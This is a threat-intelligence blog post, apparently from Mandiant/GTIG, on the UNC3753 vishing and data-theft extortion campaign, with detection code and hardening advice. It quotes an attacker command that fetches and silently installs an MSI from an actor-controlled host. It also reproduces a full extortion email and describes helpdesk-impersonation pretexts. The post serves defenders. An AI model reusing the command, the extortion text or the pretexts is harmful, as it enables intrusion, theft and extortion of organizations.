&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;From January through May 2026, Mandiant identified a financially motivated data theft extortion campaign executed by the threat cluster UNC3753 (also tracked as "Luna Moth," "Chatty Spider," and "Silent Ransom Group") targeting dozens of organizations across professional, legal, and financial services in the United States.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;UNC3753 leverages voice phishing (vishing) and social engineering techniques to gain remote access to corporate environments. Using pretexts such as data migration or invoice-related emails, the threat actors initiate phone conversations posing as IT support and convince targets to host screen-sharing sessions and download remote monitoring and management (RMM) utilities. Once inside the environment, the threat actors either directly conduct searches to locate and exfiltrate highly sensitive data, or manipulate the victim into executing these actions on their behalf. This data typically includes proprietary legal agreements, personally identifiable information (PII), and financial records, which the threat actors then use in extortion demands.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Notably, in instances possibly linked to UNC3753, threat actors have accessed victims' systems in person. &lt;/span&gt;&lt;a href="https://www.ic3.gov/CSA/2026/260526.pdf" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;In these physical incidents&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, individuals posing as IT technicians entered corporate offices to attempt direct exfiltration of data from an endpoint using USB storage media. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;This blog post details the threat group's technical lifecycle across recent Mandiant Consulting incident response engagements, highlights tactics like physical office targeting, and provides actionable recommendations to safeguard endpoints and infrastructure.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Threat Detail&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The UNC3753 campaign lifecycle reflects an optimized, fast-tempo operational model. In many Mandiant-investigated incidents, the entire attack sequence, from initial target contact to data theft and extortion, occurred within a single business day. Recently, Mandiant observed data searches, staging, and theft initiated in under an hour.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The threat group frequently initiates campaigns using benign, invoice-themed email lures sent from actor-controlled consumer email accounts. These messages contain no active links or malicious attachments. Instead, they typically contain a brief, generic message, for example: “hello, here is the invcoie we talked about yesterday”. Google Threat Intelligence Group (GTIG) assesses that the primary purpose of these emails is to establish a pretext, raising the target's internal security concerns so they are more susceptible to follow-up voice calls.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "
      &gt;

      
      
        
        &lt;img
            src="https://storage.googleapis.com/gweb-cloudblog-publish/images/seeking-counsel-fig1.max-1000x1000.png"
        
          alt="UNC3753 Attack Lifecycle"&gt;
        
      
        &lt;figcaption class="article-image__caption "&gt;&lt;p data-block-key="x6e79"&gt;Figure 1: UNC3753 attack lifecycle&lt;/p&gt;&lt;/figcaption&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h4&gt;&lt;span style="vertical-align: baseline;"&gt;Initial Access via IT Helpdesk Impersonation&lt;/span&gt;&lt;/h4&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The core of UNC3753's entry mechanism relies on targeted vishing. Mandiant has observed the group targeting personnel across all seniority levels, harvesting phone numbers and email addresses for employees who are often publicly listed on the organization’s website. Acting as members of the organization's internal IT helpdesk or security team, threat actors place direct calls to these employees.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The callers use a variety of verbal instructions to guide target behavior. Under the guise of addressing a security issue or aiding with a corporate data migration project, they build trust and direct the target to join a screen-sharing session.&lt;/span&gt;&lt;/p&gt;
&lt;h4&gt;&lt;span style="vertical-align: baseline;"&gt;Remote Screen Control and Legitimate Tool Abuse&lt;/span&gt;&lt;/h4&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Once the target is engaged, the threat actors bypass conventional automated boundary security and email filtering controls by instructing the user to download and execute screen-sharing applications. &lt;/span&gt;&lt;/p&gt;
&lt;h5&gt;&lt;span style="vertical-align: baseline;"&gt;Screen-Sharing Utilities&lt;/span&gt;&lt;/h5&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;UNC3753 instructs targets to initiate remote desktop and support sessions using built-in or commercial services, including Zoom, Microsoft Terminal Services, Microsoft Teams, and Quick Assist. During a Teams-facilitated intrusion, the threat actor held five distinct calls with the same target over a three-day period.&lt;/span&gt;&lt;/p&gt;
&lt;h5&gt;&lt;span style="vertical-align: baseline;"&gt;Commercial RMM Agents&lt;/span&gt;&lt;/h5&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;UNC3753 frequently attempts to establish more persistent access by social engineering targets into downloading AnyDesk, Bomgar, or Zoho Assist installers. In one engagement, the threat actor attempted to install a "SuperOps RMM agent" by convincing the target to download and execute a payload via a cURL command.&lt;/span&gt;&lt;/p&gt;
&lt;h5&gt;&lt;span style="vertical-align: baseline;"&gt;Message Delivery via Privnote&lt;/span&gt;&lt;/h5&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Threat actors consistently use &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;privnote[.]com&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;, a web-based, self-destructing text utility, to transmit installation links and commands to targets. Because each note is destroyed after it is read, the links and commands that the target copies and pastes leave no permanent footprint on endpoint browsers or in chat logs.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Example cURL command staging string observed in UNC3753 remote sessions:&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;pre class="language-plain"&gt;&lt;code&gt;curl -sL "http://[actor-controlled-ip]/installer" -o "SuperOps.msi" &amp;amp;&amp;amp; msiexec /i "SuperOps.msi" /quiet&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
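&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;For defenders, the shape of this command (a cURL download written to an MSI file, followed by a silent &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;msiexec&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; install) can be matched in process command-line telemetry. The Python sketch below is illustrative only: the regular expressions and the &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;is_suspicious&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; helper are assumptions made for this example, not a published detection rule, and they would need tuning against legitimate software deployment activity.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;

```python
import re

# Hypothetical patterns for illustration only (not a vendor detection rule).
# A curl invocation that writes its download to a file ending in .msi.
CURL_TO_MSI = re.compile(r'\bcurl(\.exe)?\b.*\s-o\s+"?[^"\s]+\.msi"?', re.IGNORECASE)
# An msiexec install (/i) that suppresses the installer UI (/quiet or /qn).
QUIET_MSIEXEC = re.compile(r'\bmsiexec(\.exe)?\b.*\s/i\b.*\s/(quiet|qn)\b', re.IGNORECASE)


def is_suspicious(command_line):
    """Return True when a single command line both downloads an MSI with
    curl and installs an MSI silently with msiexec."""
    downloads_msi = CURL_TO_MSI.search(command_line) is not None
    installs_quietly = QUIET_MSIEXEC.search(command_line) is not None
    return downloads_msi and installs_quietly
```

&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Applied to the example string above, &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;is_suspicious&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; returns True. A plain download of a non-MSI file, or an interactive install without a silent switch, does not match.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;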
&lt;div class="block-paragraph_advanced"&gt;&lt;h4&gt;&lt;span style="vertical-align: baseline;"&gt;Infrastructure Pivoting and Local Staging&lt;/span&gt;&lt;/h4&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Intrusions have abused Bring Your Own Device (BYOD) remote environments to access internal enterprise assets. In separate Mandiant Consulting cases, UNC3753 established Zoom sessions directly on targets' personal BYOD endpoints. Using these compromised personal laptops, they accessed corporate virtual desktop infrastructure (VDI) using native client platforms, such as Windows 365 (&lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;Windows365.exe&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;) or Citrix clients. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Once VDI environment access is secured, the threat actors pivot to corporate file systems:&lt;/span&gt;&lt;/p&gt;
&lt;ol&gt;
&lt;li aria-level="1" style="list-style-type: decimal; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;span style="vertical-align: baseline;"&gt;System Enumeration: The threat actors map local directories, enumerate active OneDrive folders, and crawl mapped network drives.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: decimal; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;span style="vertical-align: baseline;"&gt;Document Management Targeted Harvesting: Threat actors target specific legal and document storage repositories.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: decimal; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;span style="vertical-align: baseline;"&gt;Keyword Search and File Staging: Threat actors use specific keyword search functions within iManage to locate highly sensitive folders containing tax logs (Forms W-2, W-9, and 1099), audit files, corporate client agreements, and Social Security numbers (SSNs). Staged results are compiled and sorted within target-accessible subdirectories, primarily inside the user's Downloads folder or native Roaming profile path.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Data Theft&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;UNC3753 exfiltrates the staged data using a variety of methods to bypass security controls. They frequently use portable versions of WinSCP or Rclone. In other instances, they simply log into a threat actor-controlled consumer file sharing account directly within the victim's web browser and batch upload the stolen files.&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;span style="vertical-align: baseline;"&gt;Cloud Storage Staging: Threat actors instruct targets—or directly control their screens—to drag and drop staged folders into threat actor-controlled consumer file sharing accounts. In several intrusions, the exfiltration destination included folders explicitly renamed to mimic the victim organization's branding.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;span style="vertical-align: baseline;"&gt;FTP Utilities: When browser-based uploads are restricted by endpoint controls, threat actors download FTP and SFTP client binaries, primarily WinSCP, to exfiltrate bulk packages. In one incident, the threat group exfiltrated 1.7 gigabytes of data from a target's local OneDrive folder to a Google Drive account before pivoting to a VDI session and exfiltrating an additional 14.4 gigabytes using WinSCP. Google has taken action against this actor by disabling the Drive accounts and assets associated with this activity.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;span style="vertical-align: baseline;"&gt;Email Forwarding: The threat actors have also had victims stage files from internal iManage repositories and instructed them to send the files to threat actor-controlled consumer email addresses from the target's mailbox.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Threat Actor Extortion Tactics&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The threat cluster delivers unbranded extortion communications via email shortly after successfully stealing data, often within 30 minutes of exiting the target environment. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;These highly aggressive extortion letters give organizations a three-day deadline to respond and initiate ransom negotiations. If the victim organization is unresponsive, the threat actors declare they will call and email target employees and external clients directly to alert them of the data breach. The extortion letters explicitly emphasize that the leak will compromise client trust, invite substantial regulatory fines, and suggest that external clients sue the victim organization for data mishandling. Additionally, as part of a follow-on message the group has threatened to publish all exfiltrated archives on the LEAKEDDATA data leak site (DLS).&lt;/span&gt;&lt;/p&gt;
&lt;h4&gt;&lt;span style="vertical-align: baseline;"&gt;Sample Extortion Email&lt;/span&gt;&lt;/h4&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"&gt;
&lt;div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"&gt;
&lt;div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"&gt;
&lt;div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"&gt;
&lt;div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"&gt;
&lt;div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"&gt;
&lt;div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"&gt;
&lt;div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"&gt;
&lt;div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"&gt;
&lt;div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"&gt;
&lt;div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"&gt;
&lt;div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"&gt;
&lt;div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"&gt;&lt;table border="1" style="border-collapse: collapse; width: 99.9641%;"&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td style="width: 98.1839%;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;Subject: [Victim Name] has lost confidential data of their clients. Very Important!&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;Hello,&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;We have to inform you that we got access to the [Victim Name] corporation's database and took a very large dataset. We have been in your network for weeks in multiple systems , aiming for proprietary and confidential files, and were able to obtain what We were looking for as well as the data of many clients. &amp;lt;mentions the general nature of the stolen documents&amp;gt;. This is not a joke or a scam.&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;This is a real problem that puts the existence of your firm in danger and to prove it We have attached screenshots that are confirming the possession of the files.&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;Reply to Our email and We will show you the complete file tree and actual files.&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;We are an elite group who's been in this business for a very long time, We have Our own website where We post the data and thousands of individuals follow Our work , and connections in different business social media. But, what's more important, is that We want to return your data peacefully and as soon as possible.&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;We will guarantee you the complete database deletion from Our servers, video evidence of us deleting the files, privacy of our communication and Our security advice with an explanation of how We got into your network and how to fix the vulnerability that We found.&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;In order for us to solve this problem you need to send us an email and start communicating with us. We hope to find a financial solution that will be acceptable for both parties.&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;In case of ignorance or no agreement, We will notify your employees, partners and customers, after which We will publish your data. You will receive claims from individuals, and legal entities for information leakage and breach of contracts, your current deals will be terminated. Journalists and others will dig into your documents, finding inconsistencies or violations in them. Your organization will lose its reputation, shares will fall in price, and your organization will be forced to close.&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;Let us remind you that your data can be used by many other hackers and criminals on the dark web as well as your competitors and enemies in case We leak the data.&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;Law enforcement will not help you, We are out of their jurisdiction, and We already took all the critical data. They will only tell you not to communicate with us and be the first ones to fine you.&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;As soon as you reach out, We will show you all the files that We obtained, so you can understand the seriousness of this problem and the necessity to proceed to the negotiations.&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;Our communication will stay 100% private before and after the agreement. We can show the proof of it as well.&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;All further communication can be done through this email address.&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;Do not waste any time as it is ticking . Text us today, so We don't have to start calling your employees tomorrow. You will have 3 days to start communicating.&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;Here We attached some screenshots confirming all the above. Respond to this email and We will send you the file tree.&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p style="text-align: center;"&gt;&lt;span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"&gt;Figure 2: &lt;span style="vertical-align: baseline;"&gt;UNC3753 e&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;xtortion note example&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Data Leak Site&lt;/span&gt;&lt;/h3&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "
      &gt;

      
      
        
        &lt;img
            src="https://storage.googleapis.com/gweb-cloudblog-publish/images/seeking-counsel-fi3.max-1000x1000.png"
        
          alt="LEAKEDDATA DLS (partially redacted; cropped)"&gt;
        
        &lt;/a&gt;
      
        &lt;figcaption class="article-image__caption "&gt;&lt;p data-block-key="20n3k"&gt;Figure 3: LEAKEDDATA DLS (partially redacted; cropped)&lt;/p&gt;&lt;/figcaption&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h4&gt;&lt;span style="vertical-align: baseline;"&gt;Suspected UNC3753 Activity Involving Physical Access&lt;/span&gt;&lt;/h4&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;While UNC3753 primarily relies on digital vectors, GTIG assesses that associated threat actors have also attempted direct data theft using physical, in person access. This escalating tactic is corroborated by a recent &lt;/span&gt;&lt;a href="https://www.ic3.gov/CSA/2026/260526.pdf" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;FBI Cyber FLASH Alert&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; highlighting instances where Silent Ransom Group threat actors leveraged physical office access to exfiltrate corporate data via removable USB media.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;According to the FBI advisory, if remote social engineering attempts fail, actors will send an individual to a victim's physical location. The onsite threat actor will claim they need to image the device or create local backups to address a security issue. Once they gain access to the endpoint, they attempt to exfiltrate corporate data directly to an external drive.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Although limited forensic evidence and the absence of a subsequent extortion attempt prevent formal attribution, GTIG assesses that these physical intrusions are likely associated with UNC3753 based on structural, timeline, and targeting overlaps.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Attribution&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;GTIG attributes this campaign and related social engineering operations to UNC3753 based on infrastructure overlaps, domain registrar tracking, victimology, and target staging directories. &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;UNC3753 (aliases: "Luna Moth," “Chatty Spider,” and "Silent Ransom Group (SRG)") is a financially motivated threat cluster active since at least March 2022. UNC3753 has TTP overlaps with UNC2686, a threat cluster that conducted "Bazarcall" style campaigns dating to early 2021. UNC3753 deployed LOCKBIT.BLACK in 2022, but has since prioritized data theft extortion-only operations typically involving threats to post stolen files to the LEAKEDDATA DLS. The threat cluster relies heavily on Remote Monitoring and Management (RMM) tools, unlike UNC2686 which deployed BAZARLOADER variants as well as TRICKBOT, URSNIF, and SILENTNIGHT. Initially, UNC3753 used subscription-themed billing email lures (such as fake software renewal alerts), typically with PDF attachments containing phone numbers for actor-controlled call centers. Beginning around March 2025, the cluster shifted tactics to pose as internal corporate IT helpdesk staff.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Remediation and Hardening&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To mitigate the risk of voice phishing, physical office intrusions, and unauthorized endpoint control, GTIG recommends that organizations implement the following mitigation controls:&lt;/span&gt;&lt;/p&gt;
&lt;h4&gt;&lt;span style="vertical-align: baseline;"&gt;User Education&lt;/span&gt;&lt;/h4&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Conduct user awareness training specifically tailored to UNC3753 tactics, techniques, and procedures.&lt;/span&gt;&lt;/p&gt;
&lt;h4&gt;&lt;span style="vertical-align: baseline;"&gt;Physical Access and Verification Policies&lt;/span&gt;&lt;/h4&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Implement rigid out-of-band identity verification controls for all external contractors, technical staff, and facilities visitors. Mandate the following physical controls:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;span style="vertical-align: baseline;"&gt;Require visitors to display official credentials and photo identification.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;span style="vertical-align: baseline;"&gt;Require front-desk staff to copy and log all physical visitor IDs before granting access.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;span style="vertical-align: baseline;"&gt;Verify the arrival of all technicians against pre-scheduled work orders directly with the verified parent organization or helpdesk dispatcher.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;span style="vertical-align: baseline;"&gt;Enforce a policy requiring physical technical service personnel to be escorted by a corporate supervisor at all times.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h4&gt;&lt;span style="vertical-align: baseline;"&gt;Remote Access Conditional Access Controls&lt;/span&gt;&lt;/h4&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Implement remote access conditional access policies to ensure only corporate owned devices can authenticate to Virtual Desktop Instance (VDI) or Virtual Private Network (VPN) devices. This facilitates increased organizational control and visibility for potential Remote Monitoring and Management usage. &lt;/span&gt;&lt;/p&gt;
&lt;h4&gt;&lt;span style="vertical-align: baseline;"&gt;Enforce Strict RMM and Screen-Sharing Software Controls&lt;/span&gt;&lt;/h4&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Audit corporate environments to block the installation and execution of unauthorized remote monitoring, management, and support utilities. Enforce application control policies (e.g. Windows Defender Application Control or third-party endpoint protection tools) to restrict execution of non-approved binaries. Organizations may also consider restricting interactive screen-control features within authorized virtual meeting platforms like Zoom and Teams. &lt;/span&gt;&lt;/p&gt;
&lt;h4&gt;&lt;span style="vertical-align: baseline;"&gt;Endpoint Removable Media Hardening&lt;/span&gt;&lt;/h4&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To neutralize physical exfiltration vectors, disable read/write capabilities for all external USB mass storage devices. Enforce Group Policy Objects (GPOs) or MDM configurations to restrict:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;span style="vertical-align: baseline;"&gt;USB storage device installation.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;span style="vertical-align: baseline;"&gt;Removable media access.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;span style="vertical-align: baseline;"&gt;Optical media writes on all corporate endpoints and BYOD systems utilizing VDI entry.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h4&gt;&lt;span style="vertical-align: baseline;"&gt;Network Monitoring and Egress Control&lt;/span&gt;&lt;/h4&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Monitor firewall logs, network flows, and endpoint execution logs for indicative exfiltration and staging actions. Specifically:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;span style="vertical-align: baseline;"&gt;Block or alert on outbound connections to unauthorized file-sharing APIs and emails.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;span style="vertical-align: baseline;"&gt;Ensure full session logging with bytes transferred is enabled within Firewall log configurations.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;span style="vertical-align: baseline;"&gt;Monitor SSH traffic (Port 22) from internal VDIs and endpoints for high-volume WinSCP and Rclone transfers.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
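&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;As a minimal sketch of the high-volume SSH check, the following Python example totals bytes sent per source and destination pair on port 22 and returns the pairs that exceed a threshold. The record field names (&lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;src_ip&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;, &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;dst_ip&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;, &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;dst_port&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;, &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;bytes_sent&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;) and the 1 GB default threshold are assumptions for illustration; map them to the schema and baseline of your own firewall or flow logs.&lt;/span&gt;&lt;/p&gt;

```python
from collections import defaultdict


def flag_high_volume_ssh(flows, threshold_bytes=1_000_000_000, port=22):
    """Return {(src_ip, dst_ip): total_bytes} for pairs at or above the threshold.

    `flows` is an iterable of dicts with the hypothetical keys
    src_ip, dst_ip, dst_port, and bytes_sent.
    """
    totals = defaultdict(int)
    for flow in flows:
        # Only outbound sessions to the monitored port contribute to the total.
        if flow["dst_port"] == port:
            totals[(flow["src_ip"], flow["dst_ip"])] += flow["bytes_sent"]
    return {
        pair: total
        for pair, total in totals.items()
        if total >= threshold_bytes
    }
```

&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Summing across sessions rather than inspecting each session alone helps surface transfers that are split into many smaller uploads. This only works if bytes-transferred logging is enabled, as recommended above.&lt;/span&gt;&lt;/p&gt;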
&lt;h4&gt;&lt;span style="vertical-align: baseline;"&gt;Application Log and Access Auditing&lt;/span&gt;&lt;/h4&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Review authentication and access metrics for critical document stores to identify bulk harvesting profiles.&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;span style="vertical-align: baseline;"&gt;Configure real-time alerts in iManage, SharePoint, and corporate email directories for rapid file searches, search-term spikes, and mass file downloads.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;span style="vertical-align: baseline;"&gt;Implement multi-factor authentication (MFA) on business critical data repository applications, such as iManage. &lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
